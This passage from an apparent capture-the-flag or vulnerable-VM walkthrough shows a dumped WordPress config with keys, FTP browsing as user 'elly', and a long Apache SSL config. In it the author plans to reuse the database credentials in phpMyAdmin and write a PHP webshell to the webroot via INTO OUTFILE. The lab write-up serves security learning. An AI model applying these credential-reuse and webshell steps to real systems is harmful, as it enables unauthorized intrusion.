<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('SECURE_AUTH_KEY', 'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('LOGGED_IN_KEY', 'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('NONCE_KEY', 'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('AUTH_SALT', 'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('LOGGED_IN_SALT', '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('NONCE_SALT', 'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/**#@-*/</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/**</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * WordPress Database Table prefix.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * You can have multiple installations in one database if you give each a unique</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * prefix. Only numbers, letters, and underscores please!</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$table_prefix = 'wp_';</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/**</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * For developers: WordPress debugging mode.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * Change this to true to enable the display of notices during development.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * It is strongly recommended that plugin and theme developers use WP_DEBUG</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> * in their development environments.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('WP_DEBUG', false);</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/* That's all, stop editing! Happy blogging. */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/** Absolute path to the WordPress directory. */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">if ( !defined('ABSPATH') )</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>define('ABSPATH', dirname(__FILE__) . '/');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">/** Sets up WordPress vars and included files. */</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">require_once(ABSPATH . 'wp-settings.php');</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">define('WP_HTTP_BLOCK_EXTERNAL', true);</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# </span><br />
<br />
Great !!! This file has MySQL user details which can be used to login into phpMyAdmin found in nikto result.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-wrQ6Ux10boc/V1pFeDv_G9I/AAAAAAAABhU/eSkP3mlErSQD3eC_GP_OAkUNCq9WMv2lwCKgB/s1600/Screenshot%2Bfrom%2B2016-06-09%2B22-57-50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="486" src="https://1.bp.blogspot.com/-wrQ6Ux10boc/V1pFeDv_G9I/AAAAAAAABhU/eSkP3mlErSQD3eC_GP_OAkUNCq9WMv2lwCKgB/s640/Screenshot%2Bfrom%2B2016-06-09%2B22-57-50.png" width="640" /></a></div>
<br />
With this I can run SQL queries using INTO OUTFILE to create PHP file into webroot and run command. However I don't know the path for webroot.<br />
<br />
In Solution 1, I managed to access FTP server with elly's account which is basically content of /etc directory. I can look for apache conf files which will have webroot path.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# ftp 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Connected to 192.168.1.3.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-|-----------------------------------------------------------------------------------------|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-| Harry, make sure to update the banner when you get a chance to show who has access here |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-|-----------------------------------------------------------------------------------------|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Name (192.168.1.3:root): elly</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">331 Please specify the password.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Password:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">230 Login successful.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Remote system type is UNIX.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Using binary mode to transfer files.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp> cd apache2</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">250 Directory successfully changed.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp> ls</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">200 PORT command successful. Consider using PASV.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">150 Here comes the directory listing.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 7114 Jun 03 16:37 apache2.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 04 00:02 conf-available</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 04 00:02 conf-enabled</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 1782 Mar 19 10:48 envvars</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 31063 Mar 19 10:48 magic</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 12288 Jun 03 23:52 mods-available</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 23:53 mods-enabled</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 327 Jun 03 16:26 ports.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 05 17:36 sites-available</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 04 19:57 sites-enabled</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">226 Directory send OK.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp> cd sites-enabled</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">250 Directory successfully changed.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp> ls</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">200 PORT command successful. Consider using PASV.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">150 Here comes the directory listing.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">lrwxrwxrwx 1 0 0 35 Jun 03 16:22 000-default.conf -> ../sites-available/default-ssl.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">226 Directory send OK.</span><br />
<br />
Here is the content of 'default-ssl.conf' file:<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# cat default-ssl.conf </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><IfModule mod_ssl.c></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span><VirtualHost _default_:12380></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>ServerAdmin garry@red</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span><b>DocumentRoot /var/www/https</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Available loglevels: trace8, ..., trace1, debug, info, notice, warn,</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># error, crit, alert, emerg.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># It is also possible to configure the loglevel for particular</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># modules, e.g.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#LogLevel info ssl:warn</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>ErrorLog ${APACHE_LOG_DIR}/error.log</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>CustomLog ${APACHE_LOG_DIR}/access.log combined</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># For most configuration files from conf-available/, which are</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># enabled or disabled at a global level, it is possible to</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># include a line for only one particular virtual host. For example the</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># following line enables the CGI configuration for this host only</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># after it has been globally disabled with "a2disconf".</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#Include conf-available/serve-cgi-bin.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># SSL Engine Switch:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Enable/Disable SSL for this virtual host.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>SSLEngine on</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># A self-signed (snakeoil) certificate can be created by installing</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># the ssl-cert package. See</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># /usr/share/doc/apache2/README.Debian.gz for more info.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># If both key and certificate are stored in the same file, only the</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># SSLCertificateFile directive is needed.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>SSLCertificateFile<span class="Apple-tab-span" style="white-space: pre;"> </span>/etc/ssl/certs/red.crt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>SSLCertificateKeyFile /etc/ssl/certs/red.key</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Server Certificate Chain:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Point SSLCertificateChainFile at a file containing the</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># concatenation of PEM encoded CA certificates which form the</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># certificate chain for the server certificate. Alternatively</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># the referenced file can be the same as SSLCertificateFile</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># when the CA certificates are directly appended to the server</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># certificate for convinience.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLCertificateChainFile /etc/apache2/ssl.crt/server-ca.crt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Certificate Authority (CA):</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Set the CA certificate verification path where to find CA</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># certificates for client authentication or alternatively one</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># huge file containing all of them (file must be PEM encoded)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Note: Inside SSLCACertificatePath you need hash symlinks</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> to point to the certificate files. Use the provided</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> Makefile to update the hash symlinks after changes.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLCACertificatePath /etc/ssl/certs/</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLCACertificateFile /etc/apache2/ssl.crt/ca-bundle.crt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Certificate Revocation Lists (CRL):</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Set the CA revocation path where to find CA CRLs for client</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># authentication or alternatively one huge file containing all</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># of them (file must be PEM encoded)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Note: Inside SSLCARevocationPath you need hash symlinks</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> to point to the certificate files. Use the provided</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> Makefile to update the hash symlinks after changes.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLCARevocationPath /etc/apache2/ssl.crl/</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLCARevocationFile /etc/apache2/ssl.crl/ca-bundle.crl</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Client Authentication (Type):</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Client certificate verification type and depth. Types are</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># none, optional, require and optional_no_ca. Depth is a</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># number which specifies how deeply to verify the certificate</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># issuer chain before deciding the certificate is not valid.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLVerifyClient require</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLVerifyDepth 10</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># SSL Engine Options:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Set various options for the SSL engine.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># o FakeBasicAuth:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> Translate the client X.509 into a Basic Authorisation. This means that</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> the standard Auth/DBMAuth methods can be used for access control. The</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> user name is the `one line' version of the client's X.509 certificate.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> Note that no password is obtained from the user. Every entry in the user</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> file needs this password: `xxj31ZMTZzkVA'.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># o ExportCertData:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> This exports two additional environment variables: SSL_CLIENT_CERT and</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> SSL_SERVER_CERT. These contain the PEM-encoded certificates of the</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> server (always existing) and the client (only existing when client</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> authentication is used). This can be used to import the certificates</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> into CGI scripts.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># o StdEnvVars:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> This exports the standard SSL/TLS related `SSL_*' environment variables.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> Per default this exportation is switched off for performance reasons,</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> because the extraction step is an expensive operation and is usually</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> useless for serving static content. So one usually enables the</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> exportation for CGI and SSI requests only.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># o OptRenegotiate:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> This enables optimized SSL connection renegotiation handling when SSL</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> directives are used in per-directory context.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#SSLOptions +FakeBasicAuth +ExportCertData +StrictRequire</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span><FilesMatch "\.(cgi|shtml|phtml|php)$"></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>SSLOptions +StdEnvVars</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span></FilesMatch></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span><Directory /usr/lib/cgi-bin></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>SSLOptions +StdEnvVars</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span></Directory></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># SSL Protocol Adjustments:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># The safe and default but still SSL/TLS standard compliant shutdown</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># approach is that mod_ssl sends the close notify alert but doesn't wait for</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># the close notify alert from client. When you need a different shutdown</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># approach you can use one of the following variables:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># o ssl-unclean-shutdown:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> This forces an unclean shutdown when the connection is closed, i.e. no</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> SSL close notify alert is send or allowed to received. This violates</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> the SSL/TLS standard but is needed for some brain-dead browsers. Use</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> this when you receive I/O errors because of the standard approach where</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> mod_ssl sends the close notify alert.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># o ssl-accurate-shutdown:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> This forces an accurate shutdown when the connection is closed, i.e. a</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> SSL close notify alert is send and mod_ssl waits for the close notify</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> alert of the client. This is 100% SSL/TLS standard compliant, but in</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> practice often causes hanging connections with brain-dead browsers. Use</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> this only for browsers where you know that their SSL implementation</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>#<span class="Apple-tab-span" style="white-space: pre;"> </span> works correctly.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Notice: Most problems of broken clients are also related to the HTTP</span><br />
